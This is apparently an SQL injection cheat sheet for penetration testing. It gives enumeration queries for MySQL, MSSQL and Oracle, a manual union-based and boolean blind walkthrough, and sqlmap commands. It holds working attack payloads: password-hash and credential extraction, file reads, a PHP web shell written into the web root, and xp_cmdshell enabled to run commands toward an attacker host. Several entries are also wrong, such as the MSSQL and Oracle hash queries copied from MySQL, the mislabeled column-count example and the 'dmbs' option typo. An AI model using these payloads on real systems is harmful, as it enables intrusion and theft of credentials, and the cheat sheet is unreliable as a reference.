Enumeration
Gather some juicy info to move to higher privileges
MySQL
| Information | SQL Query |
|---|---|
| Database Version | select @@version |
| Current Database | select database() |
| Get other databases name | select schema_name from information_schema.schemata |
| Database User | select user()select system_user() |
| Database user, password hashes | select host, user, password from mysql.user |
| Tables Name | select table_schema,table_name from information_schema.tablesselect table_name from information_schema.tables where table_schema='userdb' |
| Columns Name | select table_name, column_name **from** information_schema.columns select column_name **from** information_schema.columns where table_name = 'usertable' |
| Read system Files | select load_file('/etc/hosts') |
| Write to File | select "<?php system($_GET['cmd']); ?>",2,3,4 into outfile '/var/www/html/legit.php' |
MSSQL
| Information | SQL Query |
|---|---|
| Database Version | select @@version; |
| Current Database | select db_name(); |
| Get available databases name | select name from master..sysdatabases; |
| If DBA | SELECT is_srvrolemember('sysadmin'); |
| Database user, password hashes | select host, user, password from mysql.user; |
| Tables Name | select table_schema,table_name from information_schema.tables;select table_name from information_schema.tables where table_schema='userdb'; |
| Columns Name | select table_name, column_name **from** information_schema.columns; select column_name **from** information_schema.columns where table_name = 'usertable'; |
| XP_CMDSHELL | sp_configure 'show advanced options', 1;RECONFIGURE;GOsp_configure 'xp_cmdshell', 1;RECONFIGURE;GOEXEC xp_cmdshell 'ping attacker_ip' |
Oracle
| Information | SQL Query |
|---|---|
| Database Version | SELECT banner FROM v$version;SELECT version FROM v$instance; |
| Current Database | SELECT SYS.DATABASE_NAME FROM DUAL;SELECT instance_name FROM V$INSTANCE; |
| Get available databases name | SELECT DISTINCT owner FROM all_tables; |
| Get DBA Accounts | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; |
| Database user, password hashes | select host, user, password from mysql.user; |
| Tables Name | SELECT table_name FROM all_tables;SELECT table_name FROM all_tables WHERE owner='web_db'; |
| Columns Name | SELECT column_name FROM all_tab_columns WHERE table_name = 'users' and owner='web_db'; |
Exploitation
Understanding Manual attack is required instead of using a tool blindly. If we don’t understand manual attack then we won’t be able to find out why a tool not working and how to do it manually when required.
MySQL Error Based Manual Example
#Find how many columns
id=1 order by 1 #No Error
id=1 order by 2 #No Error
id=1 order by 3 #No Error
id=1 order by 1 # Error
#Find vulnerable column
id=1 union select null,2,3 #Error
id=1 union select 1,null,3 #### No Error
#Get Table name
id=1 union select 1,table_name,3 from information_schema.tables
#Get Columns name from a table
id=1 union select 1,column_name,3 from information_schema.columns where table_name = 'users'
#Get contents from columns
id=1 union select 1,concat(username,0x3a,password),3 FROM users
Bolean based Blind SQL Injection
#Verify
id=1 AND '1'='1 #Load Normally
id=1 AND '1'='2 #If the site vulnerable page won't load normally
#Check if the table name start with 'a'. If it is true page will load normally.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = a
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = b
SQLMAP
Sqlmap is a powerful popular tool to exploit sql injection. This tool can exploit All possible SQL Injection vulnerability.
#Capture the request using burp suite and save to a file called post.txt, then:
sqlmap -r post.txt --technique E --threads 5 --current-db --dmbs=mysql
#Find tables
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database --tables
#Find Columns
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T users --columns
#Dump contents
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T Users --sql-query="select username,password from users"
Reference:
https://sqlwiki.netspi.com/attackQueries/informationGathering/
https://portswigger.net/web-security/sql-injection/cheat-sheet